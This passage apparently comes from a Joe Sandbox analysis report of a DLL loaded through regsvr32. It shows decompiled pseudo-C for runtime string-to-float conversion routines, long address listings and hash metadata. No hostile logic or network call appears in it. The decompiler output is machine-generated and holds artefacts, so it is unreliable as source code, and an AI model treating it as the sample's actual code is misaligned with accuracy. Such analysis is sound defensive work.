					_t252 = __r8 - _t248;
					do {
						goto L1;
					} while (r9d != 0xa);
					_t214 = 0;
					__eflags = 0;
					L10:
					__eflags = 1;
					 *_t262 = _t252;
					if(1 == 0) {
						r8d = _t214;
						_t205 = _t214;
						_t214 = 4;
						L104:
						_t193 = 0;
						_t147 = 0;
						__eflags = 0;
						L105:
						_t255 =  *((intOrPtr*)(_t250 + 0x48));
						_t148 = _t147 |  *(_t250 + 0x34);
						__eflags = _t148;
						_t255[2] = _t148;
						 *_t255 = _t193;
						_t255[0] = _t205;
						_t255[1] = r8d;
						__eflags =  *(_t250 + 0xa0) ^ _t250;
						return E10038D20(_t193,  *(_t250 + 0xa0) ^ _t250);
					}
					__eflags = r10d - 0x18;
					if(r10d <= 0x18) {
						__eflags = r10d;
						if(r10d == 0) {
							r8d = _t214;
							_t205 = _t214;
							goto L104;
						}
						L17:
						_t259 = _t258 - 1;
						__eflags =  *_t259;
						if( *_t259 != 0) {
							L20:
							_t18 = _t250 + 0x60; // 0x61
							_t19 = _t250 + 0x80; // 0x81
							E10052690(r10d, _t229, _t19, _t239, _t244, _t246, _t18, _t254, _t256, _t259);
							__eflags = r14d;
							if(r14d >= 0) {
								r8d =  *(_t250 + 0x30);
							} else {
								r8d =  *(_t250 + 0x30);
								r8d =  ~r8d;
							}
							r8d = r8d + _t191;
							__eflags = r12d;
							if(r12d == 0) {
								r8d = r8d +  *((intOrPtr*)(_t250 + 0x120));
								__eflags = r8d;
							}
							__eflags = r15d;
							if(r15d == 0) {
								r8d = r8d -  *((intOrPtr*)(_t250 + 0x128));
								__eflags = r8d;
							}
							__eflags = r8d - 0x1450;
							if(r8d > 0x1450) {
								_t205 = _t214;
								_t147 = 0x7fff;
								r8d = 0x80000000;
								_t214 = 2;
								_t193 = 0;
								goto L105;
							} else {
								__eflags = r8d - 0xffffebb0;
								if(r8d < 0xffffebb0) {
									r8d = _t214;
									_t205 = _t214;
									_t214 = 1;
									goto L104;
								}
								_t241 = 0x10070ac0;
								__eflags = r8d;
								if(r8d == 0) {
									L99:
									_t193 =  *(_t250 + 0x60) & 0x0000ffff;
									_t205 =  *(_t250 + 0x62);
									r8d =  *(_t250 + 0x66);
									_t147 =  *(_t250 + 0x68) >> 0x10;
									goto L105;
								}
								__eflags = r8d;
								if(r8d < 0) {
									r8d =  ~r8d;
									_t241 = 0x10070c20;
									__eflags = 0x10070c80;
								}
								__eflags =  *(_t250 + 0x38);
								_t154 =  ==  ? 0 :  *(_t250 + 0x60) & 0x0000ffff;
								__eflags = r8d;
								 *(_t250 + 0x60) =  ==  ? 0 :  *(_t250 + 0x60) & 0x0000ffff;
								if(r8d == 0) {
									_t214 = 0;
									__eflags = 0;
								} else {
									r9d = 0xffff8000;
									do {
										_t241 = _t241 + 0x54;
										r8d = r8d >> 3;
										__eflags = r8d & 0x00000007;
										 *(_t250 + 0x30) = r8d;
										 *((long long*)(_t250 + 0x40)) = _t241;
										if((r8d & 0x00000007) == 0) {
											goto L96;
										}
										_t236 = _t224 + _t224 * 2;
										__eflags =  *((short*)(_t241 + _t236 * 4)) - 0x8000;
										_t265 = _t241 + _t236 * 4;
										if( *((short*)(_t241 + _t236 * 4)) >= 0x8000) {
											_t35 = _t250 + 0x70; // 0x71
											_t236 = _t35;
											 *_t236 =  *_t265;
											_t185 = _t265[2];
											_t37 = _t250 + 0x70; // 0x71
											_t265 = _t37;
											 *(_t236 + 8) = _t185;
											_t224 =  *(_t250 + 0x70) >> 0x10;
											_t186 = _t185 - 1;
											__eflags = _t186;
											 *(_t250 + 0x72) = _t186;
										}
										_t194 = _t265[2] & 0x0000ffff;
										_t158 =  *(_t250 + 0x6a) & 0x0000ffff;
										r15d = 0;
										_t195 = _t194 & 0x00007fff;
										 *(_t250 + 0x50) = 0;
										_t159 = _t158 & 0x00007fff;
										 *(_t250 + 0x54) = 0;
										_t209 = (_t194 & 0x0000ffff ^ _t158) & 0x00008000;
										__eflags = _t159 - 0x7fff;
										 *(_t250 + 0x58) = 0;
										 *(_t250 + 0x38) = _t209;
										_t215 = _t224 + _t236;
										if(_t159 >= 0x7fff) {
											L95:
											__eflags = _t209;
											_t241 =  *((intOrPtr*)(_t250 + 0x40));
											_t161 =  !=  ? r9d : 0x7fff8000;
											 *(_t250 + 0x64) = 0;
											 *(_t250 + 0x60) = 0;
											 *(_t250 + 0x68) =  !=  ? r9d : 0x7fff8000;
										} else {
											__eflags = _t195 - 0x7fff;
											if(_t195 >= 0x7fff) {
												goto L95;
											}
											__eflags = _t215 - 0xbffd;
											if(_t215 > 0xbffd) {
												goto L95;
											}
											__eflags = _t215 - 0x3fbf;
											if(_t215 > 0x3fbf) {
												__eflags = _t159;
												if(_t159 != 0) {
													L47:
													__eflags = _t195;
													if(_t195 != 0) {
														L52:
														r13d = 0;
														_t242 = _t250 + 0x54;
														r12d = 5;
														do {
															__eflags = r12d;
															_t192 = r12d;
															_t237 = _t262 + _t262;
															if(r12d <= 0) {
																goto L67;
															}
															_t65 =  &(_t265[2]); // 0x9
															_t257 = _t65;
															_t67 = _t237 + 0x60; // 0x65
															_t260 = _t250 + _t67;
															_t219 = r13d & 0x00000001;
															__eflags = _t219;
															do {
																_t197 = ( *_t260 & 0x0000ffff) * ( *_t257 & 0x0000ffff);
																__eflags = _t219;
																if(_t219 == 0) {
																	r8d = 0;
																	r9d = _t224 + _t237;
																	__eflags = r9d -  *(_t242 - 4);
																	if(r9d <  *(_t242 - 4)) {
																		L62:
																		r8d = 1;
																		L63:
																		 *(_t242 - 4) = r9d;
																		goto L64;
																	}
																	__eflags = r9d - _t197;
																	if(r9d >= _t197) {
																		goto L63;
																	}
																	goto L62;
																}
																r8d = 0;
																r9d = _t224 + _t237;
																__eflags = r9d -  *(_t242 - 4);
																if(r9d <  *(_t242 - 4)) {
																	L58:
																	r8d = 1;
																	L59:
																	 *(_t242 - 4) = r9d;
																	goto L64;
																}
																__eflags = r9d - _t197;
																if(r9d >= _t197) {
																	goto L59;
																}
																goto L58;
																L64:
																__eflags = r8d;
																if(r8d != 0) {
																	 *_t242 =  *_t242 + 1;
																	__eflags =  *_t242;
																}
																_t192 = _t192 - 1;
																_t260 =  &(_t260[1]);
																_t257 = _t257 - 2;
																__eflags = _t192;
															} while (_t192 > 0);
															L67:
															r12d = r12d - 1;
															_t242 =  &(_t242[0]);
															r13d = r13d + 1;
															__eflags = r12d;
														} while (r12d > 0);
														_t216 = _t215 + 0xc002;
														__eflags = _t216;
														if(__eflags <= 0) {
															r8d =  *(_t250 + 0x58);
															_t210 =  *(_t250 + 0x54);
															r9d =  *(_t250 + 0x50);
															L82:
															_t216 = _t216 + 0xffff;
															__eflags = _t216;
															if(_t216 >= 0) {
																L74:
																_t163 =  *(_t250 + 0x50) & 0x0000ffff;
																L75:
																__eflags = _t163 - 0x8000;
																if(_t163 > 0x8000) {
																	L77:
																	_t164 =  *(_t250 + 0x52);
																	__eflags = _t164 - 0xffffffff;
																	if(_t164 != 0xffffffff) {
																		_t165 = _t164 + 1;
																		__eflags = _t165;
																		 *(_t250 + 0x52) = _t165;
																		_t210 =  *(_t250 + 0x54);
																	} else {
																		_t169 =  *(_t250 + 0x56);
																		 *(_t250 + 0x52) = 0;
																		__eflags = _t169 - 0xffffffff;
																		if(_t169 != 0xffffffff) {
																			 *(_t250 + 0x56) = _t169 + 1;
																			r8d =  *(_t250 + 0x58);
																			_t210 =  *(_t250 + 0x54);
																		} else {
																			_t171 =  *(_t250 + 0x5a) & 0x0000ffff;
																			 *(_t250 + 0x56) = 0;
																			__eflags = _t171 - 0xffff;
																			if(_t171 != 0xffff) {
																				_t210 =  *(_t250 + 0x54);
																				 *(_t250 + 0x5a) = _t171 + 1;
																				r8d =  *(_t250 + 0x58);
																			} else {
																				_t210 =  *(_t250 + 0x54);
																				 *(_t250 + 0x5a) = 0x8000;
																				r8d =  *(_t250 + 0x58);
																				_t216 = _t216 + 1;
																			}
																		}
																	}
																	L92:
																	__eflags = _t216 - 0x7fff;
																	if(_t216 < 0x7fff) {
																		 *(_t250 + 0x62) = _t210;
																		_t241 =  *((intOrPtr*)(_t250 + 0x40));
																		 *(_t250 + 0x66) = r8d;
																		r8d =  *(_t250 + 0x30);
																		 *(_t250 + 0x60) =  *(_t250 + 0x52) & 0x0000ffff;
																		 *(_t250 + 0x6a) = _t216 |  *(_t250 + 0x38);
																		r9d = 0xffff8000;
																	} else {
																		__eflags =  *(_t250 + 0x38);
																		_t241 =  *((intOrPtr*)(_t250 + 0x40));
																		r8d =  *(_t250 + 0x30);
																		r9d = 0xffff8000;
																		 *(_t250 + 0x64) = 0;
																		_t168 =  !=  ? r9d : 0x7fff8000;
																		 *(_t250 + 0x60) = 0;
																		 *(_t250 + 0x68) =  !=  ? r9d : 0x7fff8000;
																	}
																	goto L96;
																}
																r9d = r9d & 0x0001ffff;
																__eflags = r9d - 0x18000;
																if(r9d != 0x18000) {
																	goto L92;
																}
																goto L77;
															}
															r10d =  ~(_t216 & 0x0000ffff) & 0x0000ffff;
															_t216 = _t216 + r10w;
															__eflags = _t216;
															do {
																__eflags =  *(_t250 + 0x50) & 0x00000001;
																if(( *(_t250 + 0x50) & 0x00000001) != 0) {
																	r15d = r15d + 1;
																	__eflags = r15d;
																}
																r9d = r9d >> 1;
																r9d = r9d | _t210 << 0x0000001f;
																r8d = r8d >> 1;
																_t210 = _t210 >> 0x00000001 | r8d << 0x0000001f;
																_t257 = _t257 - 1;
																__eflags = _t257;
																 *(_t250 + 0x50) = r9d;
															} while (_t257 != 0);
															__eflags = r15d;
															 *(_t250 + 0x54) = _t210;
															 *(_t250 + 0x58) = r8d;
															if(r15d == 0) {
																goto L74;
															}
															_t163 = r9w | 0x00000001;
															 *(_t250 + 0x50) = _t163;
															r9d =  *(_t250 + 0x50);
															goto L75;
														}
														r8d =  *(_t250 + 0x58);
														_t210 =  *(_t250 + 0x54);
														r9d =  *(_t250 + 0x50);
														while(1) {
															asm("inc ecx");
															if(__eflags < 0) {
																break;
															}
															r8d = r8d + r8d;
															_t201 = _t210 >> 0x1f;
															r9d = r9d + r9d;
															_t210 = _t210 + _t210 | r9d >> 0x0000001f;
															r8d = r8d | _t201;
															_t216 = _t216 + 0xffff;
															 *(_t250 + 0x54) = _t210;
															 *(_t250 + 0x58) = r8d;
															__eflags = _t216;
															 *(_t250 + 0x50) = r9d;
															if(__eflags > 0) {
																continue;
															}
															goto L82;
														}
														__eflags = _t216;
														if(_t216 <= 0) {
															goto L82;
														}
														goto L74;
													}
													_t215 = _t215 + 1;
													asm("btr eax, 0x1f");
													__eflags = _t265[2];
													if(_t265[2] != 0) {
														goto L52;
													}
													__eflags = _t265[1];
													if(_t265[1] != 0) {
														goto L52;
													}
													__eflags =  *_t265;
													if( *_t265 != 0) {
														goto L52;
													}
													_t241 =  *((intOrPtr*)(_t250 + 0x40));
													 *(_t250 + 0x68) = 0;
													 *(_t250 + 0x64) = 0;
													 *(_t250 + 0x60) = 0;
													goto L96;
												}
												_t215 = _t215 + 1;
												asm("btr eax, 0x1f");
												__eflags =  *(_t250 + 0x68);
												if( *(_t250 + 0x68) != 0) {
													goto L47;
												}
												__eflags =  *(_t250 + 0x64);
												if( *(_t250 + 0x64) != 0) {
													goto L47;
												}
												__eflags =  *(_t250 + 0x60);
												if( *(_t250 + 0x60) != 0) {
													goto L47;
												}
												_t241 =  *((intOrPtr*)(_t250 + 0x40));
												 *(_t250 + 0x6a) = 0;
												goto L96;
											}
											_t241 =  *((intOrPtr*)(_t250 + 0x40));
											 *(_t250 + 0x68) = 0;
											 *(_t250 + 0x64) = 0;
											 *(_t250 + 0x60) = 0;
										}
										L96:
										__eflags = r8d;
									} while (r8d != 0);
									_t214 = 0;
								}
								goto L99;
							}
						}
						do {
							_t259 = _t259 - 1;
							r10d = r10d + 0xffffffff;
							_t191 = _t191 + 1;
							__eflags =  *_t259;
						} while ( *_t259 == 0);
						goto L20;
					}
					_t187 =  *(_t250 + 0x97) & 0x000000ff;
					__eflags = _t187 - 5;
					if(_t187 >= 5) {
						_t188 = _t187 + 1;
						__eflags = _t188;
						 *(_t250 + 0x97) = _t188;
					}
					_t258 = _t258 - 1;
					r10d = 0x18;
					_t191 = _t191 + 1;
					goto L17;
				}
				L1:
				_t252 = _t252 + 1;
				if(r9d <= 0xb) {
					_t224 = 0x10000000;
					goto __rcx;
				}
				__eflags = r9d - 0xa;
			}

















































                                                                              0x1004ed79
                                                                              0x1004ed79
                                                                              0x1004ed79
                                                                              0x1004ed79
                                                                              0x1004ed79
                                                                              0x1004ed83
                                                                              0x1004eda2
                                                                              0x1004eda5
                                                                              0x1004eda7
                                                                              0x1004edc1
                                                                              0x1004edc4
                                                                              0x1004f164
                                                                              0x1004f167
                                                                              0x00000000
                                                                              0x1004f167
                                                                              0x1004edca
                                                                              0x1004ede5
                                                                              0x1004ede5
                                                                              0x1004eda9
                                                                              0x1004ed85
                                                                              0x1004ed85
                                                                              0x1004ed85
                                                                              0x1004ed89
                                                                              0x1004ecc0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f11d
                                                                              0x1004f11d
                                                                              0x1004f11f
                                                                              0x1004f11f
                                                                              0x1004f121
                                                                              0x1004f125
                                                                              0x1004f706
                                                                              0x1004f709
                                                                              0x1004f70b
                                                                              0x1004f710
                                                                              0x1004f710
                                                                              0x1004f713
                                                                              0x1004f713
                                                                              0x1004f716
                                                                              0x1004f716
                                                                              0x1004f71b
                                                                              0x1004f71b
                                                                              0x1004f720
                                                                              0x1004f727
                                                                              0x1004f72b
                                                                              0x1004f72f
                                                                              0x1004f77b
                                                                              0x1004f78a
                                                                              0x1004f78a
                                                                              0x1004f12b
                                                                              0x1004f12f
                                                                              0x1004f20f
                                                                              0x1004f212
                                                                              0x1004f6ff
                                                                              0x1004f702
                                                                              0x00000000
                                                                              0x1004f702
                                                                              0x1004f218
                                                                              0x1004f218
                                                                              0x1004f21c
                                                                              0x1004f220
                                                                              0x1004f241
                                                                              0x1004f241
                                                                              0x1004f246
                                                                              0x1004f251
                                                                              0x1004f256
                                                                              0x1004f259
                                                                              0x1004f265
                                                                              0x1004f25b
                                                                              0x1004f25b
                                                                              0x1004f260
                                                                              0x1004f260
                                                                              0x1004f26a
                                                                              0x1004f26d
                                                                              0x1004f270
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f27a
                                                                              0x1004f27d
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f287
                                                                              0x1004f28e
                                                                              0x1004f6e9
                                                                              0x1004f6eb
                                                                              0x1004f6ef
                                                                              0x1004f6f5
                                                                              0x1004f6fa
                                                                              0x00000000
                                                                              0x1004f294
                                                                              0x1004f294
                                                                              0x1004f29b
                                                                              0x1004f6dd
                                                                              0x1004f6e0
                                                                              0x1004f6e2
                                                                              0x00000000
                                                                              0x1004f6e2
                                                                              0x1004f2a8
                                                                              0x1004f2ac
                                                                              0x1004f2af
                                                                              0x1004f6c6
                                                                              0x1004f6ca
                                                                              0x1004f6cf
                                                                              0x1004f6d3
                                                                              0x1004f6d8
                                                                              0x00000000
                                                                              0x1004f6d8
                                                                              0x1004f2b5
                                                                              0x1004f2b8
                                                                              0x1004f2c1
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2cd
                                                                              0x1004f2d7
                                                                              0x1004f2db
                                                                              0x1004f2de
                                                                              0x1004f2e3
                                                                              0x1004f6c4
                                                                              0x1004f6c4
                                                                              0x1004f2e9
                                                                              0x1004f2e9
                                                                              0x1004f2f0
                                                                              0x1004f2f3
                                                                              0x1004f2f7
                                                                              0x1004f2fb
                                                                              0x1004f2fe
                                                                              0x1004f303
                                                                              0x1004f308
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f310
                                                                              0x1004f314
                                                                              0x1004f31a
                                                                              0x1004f31e
                                                                              0x1004f323
                                                                              0x1004f323
                                                                              0x1004f328
                                                                              0x1004f32b
                                                                              0x1004f32f
                                                                              0x1004f32f
                                                                              0x1004f334
                                                                              0x1004f33c
                                                                              0x1004f340
                                                                              0x1004f340
                                                                              0x1004f343
                                                                              0x1004f343
                                                                              0x1004f347
                                                                              0x1004f34c
                                                                              0x1004f351
                                                                              0x1004f357
                                                                              0x1004f35c
                                                                              0x1004f363
                                                                              0x1004f367
                                                                              0x1004f36b
                                                                              0x1004f370
                                                                              0x1004f374
                                                                              0x1004f378
                                                                              0x1004f37d
                                                                              0x1004f380
                                                                              0x1004f69a
                                                                              0x1004f69a
                                                                              0x1004f69d
                                                                              0x1004f6a7
                                                                              0x1004f6ab
                                                                              0x1004f6af
                                                                              0x1004f6b3
                                                                              0x1004f386
                                                                              0x1004f386
                                                                              0x1004f38b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f391
                                                                              0x1004f396
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f39c
                                                                              0x1004f3a1
                                                                              0x1004f3b9
                                                                              0x1004f3bc
                                                                              0x1004f3e9
                                                                              0x1004f3e9
                                                                              0x1004f3ec
                                                                              0x1004f41f
                                                                              0x1004f41f
                                                                              0x1004f422
                                                                              0x1004f427
                                                                              0x1004f430
                                                                              0x1004f430
                                                                              0x1004f438
                                                                              0x1004f43b
                                                                              0x1004f43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f443
                                                                              0x1004f443
                                                                              0x1004f447
                                                                              0x1004f447
                                                                              0x1004f44c
                                                                              0x1004f44c
                                                                              0x1004f450
                                                                              0x1004f458
                                                                              0x1004f45b
                                                                              0x1004f45d
                                                                              0x1004f482
                                                                              0x1004f485
                                                                              0x1004f489
                                                                              0x1004f48c
                                                                              0x1004f493
                                                                              0x1004f493
                                                                              0x1004f499
                                                                              0x1004f499
                                                                              0x00000000
                                                                              0x1004f499
                                                                              0x1004f48e
                                                                              0x1004f491
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f491
                                                                              0x1004f462
                                                                              0x1004f465
                                                                              0x1004f469
                                                                              0x1004f46c
                                                                              0x1004f473
                                                                              0x1004f473
                                                                              0x1004f479
                                                                              0x1004f479
                                                                              0x00000000
                                                                              0x1004f479
                                                                              0x1004f46e
                                                                              0x1004f471
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f49d
                                                                              0x1004f49d
                                                                              0x1004f4a0
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a6
                                                                              0x1004f4a9
                                                                              0x1004f4ad
                                                                              0x1004f4b1
                                                                              0x1004f4b1
                                                                              0x1004f4b5
                                                                              0x1004f4b5
                                                                              0x1004f4b9
                                                                              0x1004f4bd
                                                                              0x1004f4c1
                                                                              0x1004f4c1
                                                                              0x1004f4ca
                                                                              0x1004f4cf
                                                                              0x1004f4d2
                                                                              0x1004f58d
                                                                              0x1004f592
                                                                              0x1004f596
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f5a0
                                                                              0x1004f524
                                                                              0x1004f524
                                                                              0x1004f529
                                                                              0x1004f529
                                                                              0x1004f52d
                                                                              0x1004f543
                                                                              0x1004f543
                                                                              0x1004f547
                                                                              0x1004f54a
                                                                              0x1004f62d
                                                                              0x1004f62d
                                                                              0x1004f630
                                                                              0x1004f634
                                                                              0x1004f550
                                                                              0x1004f550
                                                                              0x1004f554
                                                                              0x1004f558
                                                                              0x1004f55b
                                                                              0x1004f61e
                                                                              0x1004f622
                                                                              0x1004f627
                                                                              0x1004f561
                                                                              0x1004f561
                                                                              0x1004f566
                                                                              0x1004f56a
                                                                              0x1004f56e
                                                                              0x1004f607
                                                                              0x1004f60f
                                                                              0x1004f614
                                                                              0x1004f574
                                                                              0x1004f574
                                                                              0x1004f578
                                                                              0x1004f57f
                                                                              0x1004f584
                                                                              0x1004f584
                                                                              0x1004f56e
                                                                              0x1004f55b
                                                                              0x1004f638
                                                                              0x1004f638
                                                                              0x1004f63d
                                                                              0x1004f675
                                                                              0x1004f679
                                                                              0x1004f67e
                                                                              0x1004f683
                                                                              0x1004f688
                                                                              0x1004f68d
                                                                              0x1004f692
                                                                              0x1004f63f
                                                                              0x1004f63f
                                                                              0x1004f644
                                                                              0x1004f649
                                                                              0x1004f653
                                                                              0x1004f659
                                                                              0x1004f65d
                                                                              0x1004f661
                                                                              0x1004f665
                                                                              0x1004f665
                                                                              0x00000000
                                                                              0x1004f63d
                                                                              0x1004f52f
                                                                              0x1004f536
                                                                              0x1004f53d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f53d
                                                                              0x1004f5a8
                                                                              0x1004f5ac
                                                                              0x1004f5ac
                                                                              0x1004f5b0
                                                                              0x1004f5b0
                                                                              0x1004f5b5
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5c0
                                                                              0x1004f5cb
                                                                              0x1004f5ce
                                                                              0x1004f5d1
                                                                              0x1004f5d3
                                                                              0x1004f5d3
                                                                              0x1004f5d7
                                                                              0x1004f5d7
                                                                              0x1004f5de
                                                                              0x1004f5e1
                                                                              0x1004f5e5
                                                                              0x1004f5ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f5f4
                                                                              0x1004f5f8
                                                                              0x1004f5fd
                                                                              0x00000000
                                                                              0x1004f5fd
                                                                              0x1004f4d8
                                                                              0x1004f4dd
                                                                              0x1004f4e1
                                                                              0x1004f4e6
                                                                              0x1004f4e6
                                                                              0x1004f4eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f4f2
                                                                              0x1004f4fa
                                                                              0x1004f4fd
                                                                              0x1004f500
                                                                              0x1004f502
                                                                              0x1004f505
                                                                              0x1004f50a
                                                                              0x1004f50e
                                                                              0x1004f513
                                                                              0x1004f516
                                                                              0x1004f51b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f51d
                                                                              0x1004f51f
                                                                              0x1004f522
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f522
                                                                              0x1004f3f2
                                                                              0x1004f3f6
                                                                              0x1004f3fa
                                                                              0x1004f3fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3fe
                                                                              0x1004f402
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f404
                                                                              0x1004f407
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f409
                                                                              0x1004f40e
                                                                              0x1004f412
                                                                              0x1004f416
                                                                              0x00000000
                                                                              0x1004f416
                                                                              0x1004f3c2
                                                                              0x1004f3c6
                                                                              0x1004f3ca
                                                                              0x1004f3cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3ce
                                                                              0x1004f3d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3d4
                                                                              0x1004f3d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3da
                                                                              0x1004f3df
                                                                              0x00000000
                                                                              0x1004f3df
                                                                              0x1004f3a3
                                                                              0x1004f3a8
                                                                              0x1004f3ac
                                                                              0x1004f3b0
                                                                              0x1004f3b0
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6c0
                                                                              0x1004f6c0
                                                                              0x00000000
                                                                              0x1004f2e3
                                                                              0x1004f28e
                                                                              0x1004f230
                                                                              0x1004f230
                                                                              0x1004f234
                                                                              0x1004f238
                                                                              0x1004f23b
                                                                              0x1004f23b
                                                                              0x00000000
                                                                              0x1004f230
                                                                              0x1004f135
                                                                              0x1004f13d
                                                                              0x1004f13f
                                                                              0x1004f141
                                                                              0x1004f141
                                                                              0x1004f143
                                                                              0x1004f143
                                                                              0x1004f14a
                                                                              0x1004f14e
                                                                              0x1004f154
                                                                              0x00000000
                                                                              0x1004f154
                                                                              0x1004ecc0
                                                                              0x1004ecc4
                                                                              0x1004eccc
                                                                              0x1004ecdc
                                                                              0x1004ece6
                                                                              0x1004ece6
                                                                              0x1004f113

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 135b45ba5015e827ad703b7e74e586549ad323d3128cd28144aef75ea14483e3
                                                                              • Instruction ID: 95eb3932a3ee8896a6da8b1a42b488762fb7a470d840e70a450341239f220419
                                                                              • Opcode Fuzzy Hash: 135b45ba5015e827ad703b7e74e586549ad323d3128cd28144aef75ea14483e3
                                                                              • Instruction Fuzzy Hash: AF71F3B76187C5C6CB60CF29E0447AAB7A1F395780F60412AEB8983B68DB7DD445CB08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004EE78 Relevance: .2, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 87%
                                                                              			E1004EE78(signed int __ebx, signed int __edx, intOrPtr* __rsi, void* __rbp, signed char* __r8, char* __r11, signed char** __r13, signed int _a48, signed int _a52, signed int _a56, long long _a64, signed int* _a72, unsigned int _a80, signed short _a82, signed int _a84, signed int _a86, signed int _a88, signed int _a90, signed int _a96, signed int _a98, signed int _a100, signed int _a102, unsigned int _a104, signed int _a106, unsigned int _a112, signed int _a114, char _a128, signed int _a151, signed int _a160, void* _a184, void* _a192, void* _a200, void* _a208, void* _a216, void* _a224, void* _a232, void* _a240, intOrPtr _a288, intOrPtr _a296) {
				unsigned int _t143;
				signed int _t144;
				signed short _t154;
				signed short _t155;
				signed short _t159;
				signed short _t160;
				signed int _t161;
				signed int _t165;
				signed int _t167;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed char _t184;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed short _t190;
				signed short _t191;
				signed int _t193;
				signed int _t197;
				signed int _t200;
				signed int _t201;
				signed short _t205;
				signed int _t206;
				signed int _t210;
				void* _t211;
				signed int _t212;
				signed int _t215;
				unsigned long long _t224;
				void* _t230;
				signed long long _t237;
				void* _t238;
				long long _t242;
				signed int* _t243;
				void* _t245;
				intOrPtr* _t247;
				void* _t249;
				signed long long _t251;
				signed char* _t253;
				void* _t255;
				signed int* _t256;
				void* _t257;
				signed int _t258;
				char* _t259;
				char* _t260;
				signed short* _t261;
				signed char** _t263;
				signed int* _t266;

				_t263 = __r13;
				_t259 = __r11;
				_t253 = __r8;
				_t249 = __rbp;
				_t247 = __rsi;
				_t200 = __edx;
				_t187 = __ebx;
				if(__edx < 0x30) {
					L8:
					_t224 =  *((intOrPtr*)( *((intOrPtr*)( *_t247 + 0x128))));
					if(_t200 !=  *_t224) {
						__eflags = _t200 + 0xffffffd5 - 0x3a;
						if(_t200 + 0xffffffd5 > 0x3a) {
							_t253 = _t253 - _t249;
							_t210 = 0;
							L14:
							__eflags = 1;
							 *_t263 = _t253;
							if(1 == 0) {
								r8d = _t210;
								_t201 = _t210;
								_t210 = 4;
								L108:
								_t189 = 0;
								_t143 = 0;
								__eflags = 0;
								L109:
								_t256 = _a72;
								_t144 = _t143 | _a52;
								__eflags = _t144;
								_t256[2] = _t144;
								 *_t256 = _t189;
								_t256[0] = _t201;
								_t256[1] = r8d;
								__eflags = _a160 ^ _t251;
								return E10038D20(_t189, _a160 ^ _t251);
							}
							__eflags = r10d - 0x18;
							if(r10d <= 0x18) {
								__eflags = r10d;
								if(r10d == 0) {
									r8d = _t210;
									_t201 = _t210;
									goto L108;
								}
								L21:
								_t260 = _t259 - 1;
								__eflags =  *_t260;
								if( *_t260 != 0) {
									L24:
									_t15 =  &_a96; // 0x61
									_t16 =  &_a128; // 0x81
									E10052690(r10d, _t230, _t16, 0x10000000, _t245, _t247, _t15, _t255, _t257, _t260);
									__eflags = r14d;
									if(r14d >= 0) {
										r8d = _a48;
									} else {
										r8d = _a48;
										r8d =  ~r8d;
									}
									r8d = r8d + _t187;
									__eflags = r12d;
									if(r12d == 0) {
										r8d = r8d + _a288;
										__eflags = r8d;
									}
									__eflags = r15d;
									if(r15d == 0) {
										r8d = r8d - _a296;
										__eflags = r8d;
									}
									__eflags = r8d - 0x1450;
									if(r8d > 0x1450) {
										_t201 = _t210;
										_t143 = 0x7fff;
										r8d = 0x80000000;
										_t210 = 2;
										_t189 = 0;
										goto L109;
									} else {
										__eflags = r8d - 0xffffebb0;
										if(r8d < 0xffffebb0) {
											r8d = _t210;
											_t201 = _t210;
											_t210 = 1;
											goto L108;
										}
										_t242 = 0x10070ac0;
										__eflags = r8d;
										if(r8d == 0) {
											L103:
											_t189 = _a96 & 0x0000ffff;
											_t201 = _a98;
											r8d = _a102;
											_t143 = _a104 >> 0x10;
											goto L109;
										}
										__eflags = r8d;
										if(r8d < 0) {
											r8d =  ~r8d;
											_t242 = 0x10070c20;
